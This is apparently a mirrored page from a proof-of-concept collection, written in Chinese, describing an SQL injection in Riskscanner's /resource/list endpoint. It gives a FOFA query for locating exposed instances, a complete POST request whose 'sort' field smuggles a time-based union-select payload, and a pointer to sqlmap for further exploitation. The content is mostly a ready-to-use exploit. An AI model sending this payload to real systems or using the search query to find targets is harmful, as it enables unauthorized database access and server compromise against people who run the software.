admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-06 19:38:09 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web应用漏洞/Riskscanner list SQL注入漏洞.md

53 lines
826 B
Markdown
Raw Normal View History

Web应用漏洞
2022-05-17 17:43:20 +08:00
# Riskscanner list SQL注入漏洞
## 漏洞描述
Riskscanner list接口存在SQL注入漏洞通过漏洞可获取服务器权限
## 漏洞影响
```
Riskscanner
```
## FOFA
```
title="Riskscanner"
```
## 漏洞复现
登录页面
![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101940023.png)
发送漏洞请求包
```plain
POST /resource/list/1/10 HTTP/1.1
Host:
Content-Length: 41
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36
Content-Type: application/json;charset=UTF-8
{"sort":"1)a union select sleep(5) -- -"}
```
![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101940005.png)
使用工具Sqlmap
![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101940424.png)
Reference in New Issue Copy Permalink